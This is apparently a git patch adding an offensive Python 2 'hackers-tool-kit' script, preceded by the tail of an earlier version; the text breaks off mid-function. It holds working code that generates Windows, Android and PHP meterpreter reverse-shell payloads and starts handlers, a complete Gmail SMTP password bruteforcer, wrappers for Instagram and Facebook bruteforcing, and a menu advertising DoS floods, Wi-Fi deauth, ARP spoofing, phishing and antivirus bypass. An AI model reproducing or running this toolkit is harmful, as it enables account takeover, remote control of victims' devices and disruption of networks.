raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 4f71dc5689d3f9fd45f0d390acbe61b3cabb241b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 22:05:48 +0100 Subject: [PATCH 121/214] Add files via upload --- htk.py | 2740 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2740 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..636977c --- /dev/null +++ b/htk.py @@ -0,0 +1,2740 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + *********************************************** + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,7) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file ] +phpload : make a php reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 